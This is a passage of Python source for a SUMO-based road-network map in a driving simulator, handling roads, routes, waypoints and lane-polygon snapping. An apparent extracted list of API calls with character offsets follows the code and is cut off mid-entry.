class Road(RoadMap.Road, Surface):
"""This is akin to a 'road segment' in real life.
Many of these might correspond to a single named road in reality."""
def __init__(self, road_id: str, sumo_edge: Edge, road_map):
super().__init__(road_id, road_map)
self._road_id = road_id
self._sumo_edge = sumo_edge
@cached_property
def is_junction(self) -> bool:
return self._sumo_edge.isSpecial()
@cached_property
def length(self) -> float:
return self._sumo_edge.getLength()
@property
def road_id(self) -> str:
return self._road_id
@cached_property
def incoming_roads(self) -> List[RoadMap.Road]:
return [
self._map.road_by_id(edge.getID())
for edge in self._sumo_edge.getIncoming().keys()
]
@cached_property
def outgoing_roads(self) -> List[RoadMap.Road]:
return [
self._map.road_by_id(edge.getID())
for edge in self._sumo_edge.getOutgoing().keys()
]
@cached_property
def entry_surfaces(self) -> List[RoadMap.Surface]:
# TAI: also include lanes here?
return self.incoming_roads
@cached_property
def exit_surfaces(self) -> List[RoadMap.Surface]:
# TAI: also include lanes here?
return self.outgoing_roads
@lru_cache(maxsize=16)
def oncoming_roads_at_point(self, point: Point) -> List[RoadMap.Road]:
result = []
for lane in self.lanes:
offset = lane.to_lane_coord(point).s
result += [
ol.road
for ol in lane.oncoming_lanes_at_offset(offset)
if ol.road != self
]
return result
@cached_property
def parallel_roads(self) -> List[RoadMap.Road]:
from_node, to_node = (
self._sumo_edge.getFromNode(),
self._sumo_edge.getToNode(),
)
return [
self._map.road_by_id(edge.getID())
for edge in from_node.getOutgoing()
if self.road_id != edge.getID()
and edge.getToNode().getID() == to_node.getID()
]
@cached_property
def lanes(self) -> List[RoadMap.Lane]:
return [
self._map.lane_by_id(sumo_lane.getID())
for sumo_lane in self._sumo_edge.getLanes()
]
def lane_at_index(self, index: int) -> RoadMap.Lane:
return self.lanes[index]
@lru_cache(maxsize=8)
def contains_point(self, point: Point) -> bool:
# TAI: could use (cached) self._sumo_edge.getBoundingBox(...) as a quick first-pass check...
for lane in self.lanes:
if lane.contains_point(point):
return True
return False
@lru_cache(maxsize=8)
def edges_at_point(self, point: Point) -> Tuple[Point, Point]:
lanes = self.lanes
_, right_edge = lanes[0].edges_at_point(point)
left_edge, _ = lanes[-1].edges_at_point(point)
return left_edge, right_edge
@lru_cache(maxsize=4)
def shape(
self, buffer_width: float = 0.0, default_width: Optional[float] = None
) -> Polygon:
new_width = buffer_width
if default_width:
new_width += default_width
assert new_width >= 0.0
if new_width > 0:
return buffered_shape(self._sumo_edge.getShape(), new_width)
line = self._sumo_edge.getShape()
bline = buffered_shape(line, 0.0)
return line if bline.is_empty else bline
def road_by_id(self, road_id: str) -> RoadMap.Road:
road = self._roads.get(road_id)
if road:
return road
sumo_edge = self._graph.getEdge(road_id)
if not sumo_edge:
self._log.warning(
f"SumoRoadNetwork got request for unknown road_id '{road_id}'"
)
return None
road = SumoRoadNetwork.Road(road_id, sumo_edge, self)
self._roads[road_id] = road
assert road_id not in self._surfaces
self._surfaces[road_id] = road
return road
@lru_cache(maxsize=16)
def nearest_lanes(
self, point: Point, radius: Optional[float] = None, include_junctions=True
) -> List[Tuple[RoadMap.Lane, float]]:
if radius is None:
radius = max(10, 2 * self._default_lane_width)
# XXX: note that this getNeighboringLanes() call is fairly heavy/expensive (as revealed by profiling)
# The includeJunctions parameter is the opposite of include_junctions because
# what it does in the Sumo query is attach the "node" that is the junction (node)
# shape to the shape of the non-special lanes that connect to it. So if
# includeJunctions is True, we are more likely to hit "normal" lanes
# even when in an intersection where we want to hit "special"
# lanes when we specify include_junctions=True. Note that "special"
# lanes are always candidates to be returned, no matter what.
candidate_lanes = self._graph.getNeighboringLanes(
point[0],
point[1],
r=radius,
includeJunctions=not include_junctions,
allowFallback=False,
)
if not include_junctions:
candidate_lanes = [
lane for lane in candidate_lanes if not lane[0].getEdge().isSpecial()
]
candidate_lanes.sort(key=lambda lane_dist_tup: lane_dist_tup[1])
return [(self.lane_by_id(lane.getID()), dist) for lane, dist in candidate_lanes]
@lru_cache(maxsize=16)
def road_with_point(self, point: Point) -> RoadMap.Road:
radius = max(5, 2 * self._default_lane_width)
for nl, dist in self.nearest_lanes(point, radius):
if dist < 0.5 * nl._width + 1e-1:
return nl.road
return None
def generate_routes(
self,
start_road: RoadMap.Road,
end_road: RoadMap.Road,
via: Optional[Sequence[RoadMap.Road]] = None,
max_to_gen: int = 1,
) -> List[RoadMap.Route]:
assert max_to_gen == 1, "multiple route generation not yet supported for Sumo"
newroute = SumoRoadNetwork.Route(self)
result = [newroute]
roads = [start_road]
if via:
roads += via
if end_road != start_road:
roads.append(end_road)
edges = []
for cur_road, next_road in zip(roads, roads[1:] + [None]):
if not next_road:
edges.append(cur_road._sumo_edge)
break
sub_route = (
self._graph.getShortestPath(cur_road._sumo_edge, next_road._sumo_edge)[
0
]
or []
)
if len(sub_route) < 2:
self._log.warning(
f"Unable to find valid path between {(cur_road.road_id, next_road.road_id)}."
)
return result
# The sub route includes the boundary roads (cur_road, next_road).
# We clip the latter to prevent duplicates
edges.extend(sub_route[:-1])
if len(edges) == 1:
# route is within a single road
newroute.add_road(self.road_by_id(edges[0].getID()))
return result
used_edges = []
edge_ids = []
adjacent_edge_pairs = zip(edges, edges[1:])
for cur_edge, next_edge in adjacent_edge_pairs:
internal_routes = self._internal_routes_between(cur_edge, next_edge)
for internal_route in internal_routes:
used_edges.extend(internal_route)
edge_ids.extend([edge.getID() for edge in internal_route])
_, indices = np.unique(edge_ids, return_index=True)
for idx in sorted(indices):
newroute.add_road(self.road_by_id(used_edges[idx].getID()))
return result
def _internal_routes_between(
self, start_edge: Edge, end_edge: Edge
) -> List[List[Edge]]:
routes = []
outgoing = start_edge.getOutgoing()
assert end_edge in outgoing, (
f"{end_edge.getID()} not in {[e.getID() for e in outgoing.keys()]}. "
"Perhaps you're using a LapMission on a route that is not a closed loop?"
)
connections = outgoing[end_edge]
for connection in connections:
conn_route = [start_edge]
# This connection may have some intermediate 'via' lanes.
# we need to follow these to eventually leave the junction.
via_lane_id = connection.getViaLaneID()
while via_lane_id:
via_lane = self.lane_by_id(via_lane_id)
via_road = via_lane.road
via_edge = via_road._sumo_edge
conn_route.append(via_edge)
# Sometimes we get the same via lane id multiple times.
# We convert to a set to remove duplicates.
next_via_lane_ids = set(
conn.getViaLaneID() for conn in via_edge.getOutgoing()[end_edge]
)
assert (
len(next_via_lane_ids) == 1
), f"Expected exactly one next via lane id at {via_lane_id}, got: {next_via_lane_ids}"
via_lane_id = list(next_via_lane_ids)[0]
conn_route.append(end_edge)
routes.append(conn_route)
return routes
def random_route(self, max_route_len: int = 10) -> RoadMap.Route:
route = SumoRoadNetwork.Route(self)
next_edges = self._graph.getEdges(False)
while next_edges and len(route.roads) < max_route_len:
cur_edge = random.choice(next_edges)
route.add_road(self.road_by_id(cur_edge.getID()))
next_edges = list(cur_edge.getOutgoing().keys())
return route
def empty_route(self) -> RoadMap.Route:
return SumoRoadNetwork.Route(self)
def waypoint_paths(
self,
pose: Pose,
lookahead: int,
within_radius: float = 5,
route: RoadMap.Route = None,
) -> List[List[Waypoint]]:
if route:
if route.roads:
road_ids = [road.road_id for road in route.roads]
else:
road_ids = self._resolve_in_junction(pose)
if road_ids:
return self._waypoint_paths_along_route(
pose.position, lookahead, road_ids
)
closest_lps = self._lanepoints.closest_lanepoints(
[pose], within_radius=within_radius
)
closest_lane = closest_lps[0].lane
# TAI: the above lines could be replaced by:
# closest_lane = self.nearest_lane(pose.position, radius=within_radius)
waypoint_paths = []
for lane in closest_lane.road.lanes:
waypoint_paths += lane._waypoint_paths_at(pose.position, lookahead)
return sorted(waypoint_paths, key=lambda p: p[0].lane_index)
def _resolve_in_junction(self, pose: Pose) -> List[str]:
# This is so that the waypoints don't jump between connections
# when we don't know which lane we're on in a junction.
# We take the 10 closest lanepoints then filter down to that which has
# the closest heading. This way we get the lanepoint on our lane instead of
# a potentially closer lane that is on a different junction connection.
closest_lps = self._lanepoints.closest_lanepoints([pose], within_radius=None)
closest_lps.sort(key=lambda lp: abs(pose.heading - lp.pose.heading))
lane = closest_lps[0].lane
if not lane.in_junction:
return []
road_ids = [lane.road.road_id]
next_roads = lane.road.outgoing_roads
assert (
len(next_roads) <= 1
), "A junction is expected to have <= 1 outgoing roads"
if next_roads:
road_ids.append(next_roads[0].road_id)
return road_ids
def _waypoint_paths_along_route(
self, point, lookahead: int, route: Sequence[str]
) -> List[List[Waypoint]]:
"""finds the closest lane to vehicle's position that is on its route,
then gets waypoint paths from all lanes in its edge there."""
assert len(route) > 0, f"Expected at least 1 road in the route, got: {route}"
closest_llp_on_each_route_road = [
self._lanepoints.closest_linked_lanepoint_on_road(point, road)
for road in route
]
closest_linked_lp = min(
closest_llp_on_each_route_road,
key=lambda l_lp: np.linalg.norm(
vec_2d(l_lp.lp.pose.position) - vec_2d(point)
),
)
closest_lane = closest_linked_lp.lp.lane
waypoint_paths = []
for lane in closest_lane.road.lanes:
waypoint_paths += lane._waypoint_paths_at(point, lookahead, route)
return sorted(waypoint_paths, key=lambda p: p[0].lane_index)
class Route(RoadMap.Route):
"""Describes a route between two roads."""
def __init__(self, road_map):
self._roads = []
self._length = 0
self._map = road_map
@property
def roads(self) -> List[RoadMap.Road]:
return self._roads
@property
def road_length(self) -> float:
return self._length
def add_road(self, road: RoadMap.Road):
"""Add a road to this route."""
self._length += road.length
self._roads.append(road)
@cached_property
def geometry(self) -> Sequence[Sequence[Tuple[float, float]]]:
return [
list(
road.shape(
0.0, sum([lane._width for lane in road.lanes])
).exterior.coords
)
for road in self.roads
]
@lru_cache(maxsize=8)
def distance_between(self, start: Point, end: Point) -> Optional[float]:
for cand_start_lane, _ in self._map.nearest_lanes(start, 30.0, False):
try:
sind = self._roads.index(cand_start_lane.road)
break
except ValueError:
pass
else:
logging.warning("unable to find road on route near start point")
return None
start_road = cand_start_lane.road
for cand_end_lane, _ in self._map.nearest_lanes(end, 30.0, False):
try:
eind = self._roads.index(cand_end_lane.road)
break
except ValueError:
pass
else:
logging.warning("unable to find road on route near end point")
return None
end_road = cand_end_lane.road
d = 0
start_offset = cand_start_lane.offset_along_lane(start)
end_offset = cand_end_lane.offset_along_lane(end)
if start_road == end_road:
return end_offset - start_offset
negate = False
if sind > eind:
cand_start_lane = cand_end_lane
start_road, end_road = end_road, start_road
start_offset, end_offset = end_offset, start_offset
negate = True
for road in self._roads:
if d == 0 and road == start_road:
d += cand_start_lane.length - start_offset
elif road == end_road:
d += end_offset
break
elif d > 0:
d += road.length
return -d if negate else d
@lru_cache(maxsize=8)
def project_along(
self, start: Point, distance: float
) -> Optional[Set[Tuple[RoadMap.Lane, float]]]:
route_roads = set(self._roads)
for cand_start_lane, _ in self._map.nearest_lanes(start, 30.0, False):
if cand_start_lane.road in route_roads:
break
else:
logging.warning("unable to find road on route near start point")
return None
started = False
for road in self._roads:
if not started:
if road != cand_start_lane.road:
continue
started = True
lane_pt = cand_start_lane.to_lane_coord(start)
start_offset = lane_pt.s
else:
start_offset = 0
if distance > road.length - start_offset:
distance -= road.length - start_offset
continue
return {(lane, distance) for lane in road.lanes}
return set()
def _compute_road_polygons(self):
lane_to_poly = {}
for edge in self._graph.getEdges():
for lane in edge.getLanes():
shape = buffered_shape(lane.getShape(), lane.getWidth())
# Check if "shape" is just a point.
if len(set(shape.exterior.coords)) == 1:
logging.debug(
f"Lane:{lane.getID()} has provided non-shape values {lane.getShape()}"
)
continue
lane_to_poly[lane.getID()] = shape
# Remove holes created at tight junctions due to crude map geometry
self._snap_internal_holes(lane_to_poly)
self._snap_external_holes(lane_to_poly)
# Remove break in visible lane connections created when lane enters an intersection
self._snap_internal_edges(lane_to_poly)
polys = list(lane_to_poly.values())
for node in self._graph.getNodes():
line = node.getShape()
if len(line) <= 2 or len(set(line)) == 1:
self._log.debug(
"Skipping {}-type node with <= 2 vertices".format(node.getType())
)
continue
polys.append(Polygon(line))
return polys
def _snap_internal_edges(self, lane_to_poly, snap_threshold=2):
# HACK: Internal edges that have tight curves, when buffered their ends do not
# create a tight seam with the connected lanes. This procedure attempts
# to remedy that with snapping.
for lane_id in lane_to_poly:
lane = self._graph.getLane(lane_id)
# Only do snapping for internal edge lanes
if not lane.getEdge().isSpecial():
continue
lane_shape = lane_to_poly[lane_id]
incoming = self._graph.getLane(lane_id).getIncoming()[0]
incoming_shape = lane_to_poly.get(incoming.getID())
if incoming_shape:
lane_shape = Polygon(snap(lane_shape, incoming_shape, snap_threshold))
lane_to_poly[lane_id] = lane_shape
outgoing = self._graph.getLane(lane_id).getOutgoing()[0].getToLane()
outgoing_shape = lane_to_poly.get(outgoing.getID())
if outgoing_shape:
lane_shape = Polygon(snap(lane_shape, outgoing_shape, snap_threshold))
lane_to_poly[lane_id] = lane_shape
def _snap_internal_holes(self, lane_to_poly, snap_threshold=2):
for lane_id in lane_to_poly:
lane = self._graph.getLane(lane_id)
# Only do snapping for internal edge lane holes
if not lane.getEdge().isSpecial():
continue
lane_shape = lane_to_poly[lane_id]
new_coords = []
last_added = None
for x, y in lane_shape.exterior.coords:
p = shPoint(x, y)
snapped_to = set()
moved = True
thresh = snap_threshold
while moved:
moved = False
for nl, dist in self.nearest_lanes(
Point(p.x, p.y),
include_junctions=False,
):
if not nl or nl.lane_id == lane_id or nl in snapped_to:
continue
nl_shape = lane_to_poly.get(nl.lane_id)
if nl_shape:
_, np = nearest_points(p, nl_shape)
if p.distance(np) < thresh:
p = np # !!!! :)
# allow vertices to snap to more than one thing, but
# try to avoid infinite loops and making things worse instead of better here...
# (so reduce snap dist threshold by an arbitrary amount each pass.)
moved = True
snapped_to.add(nl)
thresh *= 0.75
if p != last_added:
new_coords.append(p)
last_added = p
if new_coords:
lane_to_poly[lane_id] = Polygon(new_coords)
def _snap_external_holes(self, lane_to_poly, snap_threshold=2):
for lane_id in lane_to_poly:
lane = self._graph.getLane(lane_id)
# Only do snapping for external edge lane holes
if lane.getEdge().isSpecial():
continue
incoming = lane.getIncoming()
if incoming and incoming[0].getEdge().isSpecial():
continue
outgoing = lane.getOutgoing()
if outgoing:
outgoing_lane = outgoing[0].getToLane()
if outgoing_lane.getEdge().isSpecial():
continue
lane_shape = lane_to_poly[lane_id]
new_coords = []
last_added = None
for x, y in lane_shape.exterior.coords:
p = shPoint(x, y)
snapped_to = set()
moved = True
thresh = snap_threshold
while moved:
moved = False
for nl, dist in self.nearest_lanes(
Point(p.x, p.y),
include_junctions=False,
):
if (
not nl
or nl.in_junction
or nl.lane_id == lane_id
or nl in snapped_to
):
continue
nl_shape = lane_to_poly.get(nl.lane_id)
if nl_shape:
_, np = nearest_points(p, nl_shape)
if p.distance(np) < thresh:
p = np # !!!! :)
# allow vertices to snap to more than one thing, but
# try to avoid infinite loops and making things worse instead of better here...
# (so reduce snap dist threshold by an arbitrary amount each pass.)
moved = True
snapped_to.add(nl)
thresh *= 0.75
if p != last_added:
new_coords.append(p)
last_added = p
if new_coords:
lane_to_poly[lane_id] = Polygon(new_coords)
def _make_glb_from_polys(self, polygons):
scene = trimesh.Scene()
mesh = generate_mesh_from_polygons(polygons)
# Attach additional information for rendering as metadata in the map glb
metadata = {}
# <2D-BOUNDING_BOX>: four floats separated by ',' (<FLOAT>,<FLOAT>,<FLOAT>,<FLOAT>),
# which describe x-minimum, y-minimum, x-maximum, and y-maximum
metadata["bounding_box"] = self._graph.getBoundary()
# lane markings information
lane_dividers, edge_dividers = self._compute_traffic_dividers()
metadata["lane_dividers"] = lane_dividers
metadata["edge_dividers"] = edge_dividers
mesh.visual = trimesh.visual.TextureVisuals(
material=trimesh.visual.material.PBRMaterial()
)
scene.add_geometry(mesh)
return _GLBData(gltf.export_glb(scene, extras=metadata, include_normals=True))
def _compute_traffic_dividers(self, threshold=1):
lane_dividers = [] # divider between lanes with same traffic direction
edge_dividers = [] # divider between lanes with opposite traffic direction
edge_borders = []
for edge in self._graph.getEdges():
# Omit intersection for now
if edge.getFunction() == "internal":
continue
lanes = edge.getLanes()
for i in range(len(lanes)):
shape = lanes[i].getShape()
left_side = sumolib.geomhelper.move2side(
shape, -lanes[i].getWidth() / 2
)
right_side = sumolib.geomhelper.move2side(
shape, lanes[i].getWidth() / 2
)
if i == 0:
edge_borders.append(right_side)
if i == len(lanes) - 1:
edge_borders.append(left_side)
else:
lane_dividers.append(left_side)
# The edge borders that overlapped in positions form an edge divider
for i in range(len(edge_borders) - 1):
for j in range(i + 1, len(edge_borders)):
edge_border_i = np.array(
[edge_borders[i][0], edge_borders[i][-1]]
) # start and end position
edge_border_j = np.array(
[edge_borders[j][-1], edge_borders[j][0]]
) # start and end position with reverse traffic direction
# The edge borders of two lanes do not always overlap perfectly, thus relax the tolerance threshold to 1
if np.linalg.norm(edge_border_i - edge_border_j) < threshold:
edge_dividers.append(edge_borders[i])
return lane_dividers, edge_dividers
# specific to SUMO road networks
def get_edge_in_junction(
self, start_edge_id, start_lane_index, end_edge_id, end_lane_index
) -> str:
"""Returns the id of the edge between the start and end edge. Can be used for any edge but
is mainly useful for junctions.
"""
start_edge = self._graph.getEdge(start_edge_id)
start_lane = start_edge.getLane(start_lane_index)
end_edge = self._graph.getEdge(end_edge_id)
end_lane = end_edge.getLane(end_lane_index)
connection = start_lane.getConnection(end_lane)
# If there is no connection beween try and do the best
if connection is None:
# The first id is good enough since we just need to determine the junction edge id
connection = start_edge.getConnections(end_edge)[0]
connection_lane_id = connection.getViaLaneID()
connection_lane = self._graph.getLane(connection_lane_id)
return connection_lane.getEdge().getID()
class _WaypointsCache:
def __init__(self):
self.lookahead = 0
self.point = (0, 0, 0)
self.filter_road_ids = ()
self._starts = {}
# XXX: all vehicles share this cache now (as opposed to before
# when it was in Plan.py and each vehicle had its own cache).
# TODO: probably need to add vehicle_id to the key somehow (or just make it bigger)
def _match(self, lookahead, point, filter_road_ids) -> bool:
return (
lookahead <= self.lookahead
and point[0] == self.point[0]
and point[1] == self.point[1]
and filter_road_ids == self.filter_road_ids
)
def update(
self,
lookahead: int,
point: Tuple[float, float, float],
filter_road_ids: tuple,
llp,
paths: List[List[Waypoint]],
):
"""Update the current cache if not already cached."""
if not self._match(lookahead, point, filter_road_ids):
self.lookahead = lookahead
self.point = point
self.filter_road_ids = filter_road_ids
self._starts = {}
self._starts[llp.lp.lane.index] = paths
def query(
self,
lookahead: int,
point: Tuple[float, float, float],
filter_road_ids: tuple,
llp,
) -> Optional[List[List[Waypoint]]]:
"""Attempt to find previously cached waypoints"""
if self._match(lookahead, point, filter_road_ids):
hit = self._starts.get(llp.lp.lane.index, None)
if hit:
# consider just returning all of them (not slicing)?
return [path[: (lookahead + 1)] for path in hit]
return None
def _waypoints_starting_at_lanepoint(
self,
lanepoint: LinkedLanePoint,
lookahead: int,
filter_road_ids: tuple,
point: Tuple[float, float, float],
) -> List[List[Waypoint]]:
"""computes equally-spaced Waypoints for all lane paths starting at lanepoint
up to lookahead waypoints ahead, constrained to filter_road_ids if specified."""
# The following acts sort of like lru_cache(1), but it allows
# for lookahead to be <= to the cached value...
cache_paths = self._waypoints_cache.query(
lookahead, point, filter_road_ids, lanepoint
)
if cache_paths:
return cache_paths
lanepoint_paths = self._lanepoints.paths_starting_at_lanepoint(
lanepoint, lookahead, filter_road_ids
)
result = [
SumoRoadNetwork._equally_spaced_path(
path, point, self._map_spec.lanepoint_spacing
)
for path in lanepoint_paths
]
self._waypoints_cache.update(
lookahead, point, filter_road_ids, lanepoint, result
)
return result
@staticmethod
def _equally_spaced_path(
path: Sequence[LinkedLanePoint],
point: Tuple[float, float, float],
lp_spacing: float,
) -> List[Waypoint]:
"""given a list of LanePoints starting near point, that may not be evenly spaced,
returns the same number of Waypoints that are evenly spaced and start at point."""
continuous_variables = [
"positions_x",
"positions_y",
"headings",
"lane_width",
"speed_limit",
]
discrete_variables = ["lane_id", "lane_index"]
ref_lanepoints_coordinates = {
parameter: [] for parameter in (continuous_variables + discrete_variables)
}
for idx, lanepoint in enumerate(path):
if lanepoint.is_inferred and 0 < idx < len(path) - 1:
continue
ref_lanepoints_coordinates["positions_x"].append(
lanepoint.lp.pose.position[0]
)
ref_lanepoints_coordinates["positions_y"].append(
lanepoint.lp.pose.position[1]
)
ref_lanepoints_coordinates["headings"].append(
lanepoint.lp.pose.heading.as_bullet
)
ref_lanepoints_coordinates["lane_id"].append(lanepoint.lp.lane.lane_id)
ref_lanepoints_coordinates["lane_index"].append(lanepoint.lp.lane.index)
ref_lanepoints_coordinates["lane_width"].append(lanepoint.lp.lane._width)
ref_lanepoints_coordinates["speed_limit"].append(
lanepoint.lp.lane.speed_limit
)
ref_lanepoints_coordinates["headings"] = inplace_unwrap(
ref_lanepoints_coordinates["headings"]
)
first_lp_heading = ref_lanepoints_coordinates["headings"][0]
lp_position = path[0].lp.pose.position[:2]
vehicle_pos = np.array(point[:2])
heading_vec = np.array(radians_to_vec(first_lp_heading))
projected_distant_lp_vehicle = np.inner(
(vehicle_pos - lp_position), heading_vec
)
ref_lanepoints_coordinates["positions_x"][0] = (
lp_position[0] + projected_distant_lp_vehicle * heading_vec[0]
)
ref_lanepoints_coordinates["positions_y"][0] = (
lp_position[1] + projected_distant_lp_vehicle * heading_vec[1]
)
# To ensure that the distance between waypoints are equal, we used
# interpolation approach inspired by:
# https://stackoverflow.com/a/51515357
cumulative_path_dist = np.cumsum(
np.sqrt(
np.ediff1d(ref_lanepoints_coordinates["positions_x"], to_begin=0) ** 2
+ np.ediff1d(ref_lanepoints_coordinates["positions_y"], to_begin=0) ** 2
)
)
if len(cumulative_path_dist) <= lp_spacing:
lp = path[0].lp
return [
Waypoint(
pos=lp.pose.position,
heading=lp.pose.heading,
lane_width=lp.lane._width,
speed_limit=lp.lane.speed_limit,
lane_id=lp.lane.lane_id,
lane_index=lp.lane.index,
)
]
evenly_spaced_cumulative_path_dist = np.linspace(
0, cumulative_path_dist[-1], len(path)
)
evenly_spaced_coordinates = {}
for variable in continuous_variables:
evenly_spaced_coordinates[variable] = np.interp(
evenly_spaced_cumulative_path_dist,
cumulative_path_dist,
ref_lanepoints_coordinates[variable],
)
for variable in discrete_variables:
ref_coordinates = ref_lanepoints_coordinates[variable]
evenly_spaced_coordinates[variable] = []
jdx = 0
for idx in range(len(path)):
while (
jdx + 1 < len(cumulative_path_dist)
and evenly_spaced_cumulative_path_dist[idx]
> cumulative_path_dist[jdx + 1]
):
jdx += 1
evenly_spaced_coordinates[variable].append(ref_coordinates[jdx])
evenly_spaced_coordinates[variable].append(ref_coordinates[-1])
equally_spaced_path = []
for idx in range(len(path)):
equally_spaced_path.append(
Waypoint(
pos=np.array(
[
evenly_spaced_coordinates["positions_x"][idx],
evenly_spaced_coordinates["positions_y"][idx],
]
),
heading=Heading(evenly_spaced_coordinates["headings"][idx]),
lane_width=evenly_spaced_coordinates["lane_width"][idx],
speed_limit=evenly_spaced_coordinates["speed_limit"][idx],
lane_id=evenly_spaced_coordinates["lane_id"][idx],
lane_index=evenly_spaced_coordinates["lane_index"][idx],
)
)
return equally_spaced_path
|
[
"smarts.core.utils.sumo.sumolib.geomhelper.positionAtShapeOffset",
"os.path.isfile",
"numpy.linalg.norm",
"numpy.inner",
"trimesh.exchange.gltf.export_glb",
"numpy.interp",
"os.path.join",
"numpy.unique",
"shapely.geometry.Point",
"trimesh.Scene",
"shapely.geometry.Polygon",
"logging.warning",
"os.path.dirname",
"numpy.radians",
"subprocess.check_output",
"smarts.core.utils.sumo.sumolib.geomhelper.polygonOffsetWithMinimumDistanceToPoint",
"smarts.core.utils.sumo.sumolib.net.readNet",
"smarts.core.utils.sumo.sumolib.geomhelper.distance",
"numpy.dot",
"shapely.ops.nearest_points",
"shapely.ops.snap",
"os.path.isdir",
"random.choice",
"trimesh.visual.material.PBRMaterial",
"numpy.array",
"functools.lru_cache",
"logging.getLogger",
"numpy.ediff1d"
] |
[((4537, 4557), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(1)'}), '(maxsize=1)\n', (4546, 4557), False, 'from functools import lru_cache\n'), ((26149, 26170), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(16)'}), '(maxsize=16)\n', (26158, 26170), False, 'from functools import lru_cache\n'), ((27621, 27642), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(16)'}), '(maxsize=16)\n', (27630, 27642), False, 'from functools import lru_cache\n'), ((3288, 3330), 'logging.getLogger', 'logging.getLogger', (['self.__class__.__name__'], {}), '(self.__class__.__name__)\n', (3305, 3330), False, 'import logging\n'), ((4411, 4441), 'os.path.dirname', 'os.path.dirname', (['net_file_path'], {}), '(net_file_path)\n', (4426, 4441), False, 'import os\n'), ((4457, 4513), 'os.path.join', 'os.path.join', (['net_file_folder', 'cls.shifted_net_file_name'], {}), '(net_file_folder, cls.shifted_net_file_name)\n', (4469, 4513), False, 'import os\n'), ((4682, 4713), 'logging.getLogger', 'logging.getLogger', (['cls.__name__'], {}), '(cls.__name__)\n', (4699, 4713), False, 'import logging\n'), ((5950, 5998), 'smarts.core.utils.sumo.sumolib.net.readNet', 'sumolib.net.readNet', (['net_file'], {'withInternal': '(True)'}), '(net_file, withInternal=True)\n', (5969, 5998), False, 'from smarts.core.utils.sumo import sumolib\n'), ((7458, 7488), 'os.path.isdir', 'os.path.isdir', (['map_spec.source'], {}), '(map_spec.source)\n', (7471, 7488), False, 'import os\n'), ((14204, 14225), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(16)'}), '(maxsize=16)\n', (14213, 14225), False, 'from functools import lru_cache\n'), ((17696, 17716), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(4)'}), '(maxsize=4)\n', (17705, 17716), False, 'from functools import lru_cache\n'), ((18393, 18413), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (18402, 18413), False, 'from functools import lru_cache\n'), ((18819, 18839), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (18828, 18839), False, 'from functools import lru_cache\n'), ((19699, 19719), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (19708, 19719), False, 'from functools import lru_cache\n'), ((19923, 19943), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (19932, 19943), False, 'from functools import lru_cache\n'), ((20192, 20212), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (20201, 20212), False, 'from functools import lru_cache\n'), ((20346, 20366), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (20355, 20366), False, 'from functools import lru_cache\n'), ((20485, 20497), 'functools.lru_cache', 'lru_cache', (['(8)'], {}), '(8)\n', (20494, 20497), False, 'from functools import lru_cache\n'), ((20628, 20640), 'functools.lru_cache', 'lru_cache', (['(8)'], {}), '(8)\n', (20637, 20640), False, 'from functools import lru_cache\n'), ((20780, 20800), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (20789, 20800), False, 'from functools import lru_cache\n'), ((20928, 20948), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (20937, 20948), False, 'from functools import lru_cache\n'), ((23185, 23206), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(16)'}), '(maxsize=16)\n', (23194, 23206), False, 'from functools import lru_cache\n'), ((24412, 24432), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (24421, 24432), False, 'from functools import lru_cache\n'), ((24745, 24765), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (24754, 24765), False, 'from functools import lru_cache\n'), ((25037, 25057), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(4)'}), '(maxsize=4)\n', (25046, 25057), False, 'from functools import lru_cache\n'), ((29803, 29841), 'numpy.unique', 'np.unique', (['edge_ids'], {'return_index': '(True)'}), '(edge_ids, return_index=True)\n', (29812, 29841), True, 'import numpy as np\n'), ((35980, 36000), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (35989, 36000), False, 'from functools import lru_cache\n'), ((37792, 37812), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(8)'}), '(maxsize=8)\n', (37801, 37812), False, 'from functools import lru_cache\n'), ((45593, 45608), 'trimesh.Scene', 'trimesh.Scene', ([], {}), '()\n', (45606, 45608), False, 'import trimesh\n'), ((54227, 54246), 'numpy.array', 'np.array', (['point[:2]'], {}), '(point[:2])\n', (54235, 54246), True, 'import numpy as np\n'), ((54351, 54399), 'numpy.inner', 'np.inner', (['(vehicle_pos - lp_position)', 'heading_vec'], {}), '(vehicle_pos - lp_position, heading_vec)\n', (54359, 54399), True, 'import numpy as np\n'), ((2213, 2238), 'numpy.radians', 'np.radians', (['camera.fov[1]'], {}), '(camera.fov[1])\n', (2223, 2238), True, 'import numpy as np\n'), ((5018, 5131), 'subprocess.check_output', 'check_output', (["['netconvert', '--offset.disable-normalization=FALSE', '-s', net_file_path,\n '-o', shifted_path]"], {}), "(['netconvert', '--offset.disable-normalization=FALSE', '-s',\n net_file_path, '-o', shifted_path])\n", (5030, 5131), False, 'from subprocess import check_output\n'), ((7575, 7619), 'os.path.join', 'os.path.join', (['map_spec.source', '"""map.net.xml"""'], {}), "(map_spec.source, 'map.net.xml')\n", (7587, 7619), False, 'import os\n'), ((14738, 14761), 'numpy.linalg.norm', 'np.linalg.norm', (['my_vect'], {}), '(my_vect)\n', (14752, 14761), True, 'import numpy as np\n'), ((20085, 20146), 'smarts.core.utils.sumo.sumolib.geomhelper.positionAtShapeOffset', 'sumolib.geomhelper.positionAtShapeOffset', (['shape', 'lane_point.s'], {}), '(shape, lane_point.s)\n', (20125, 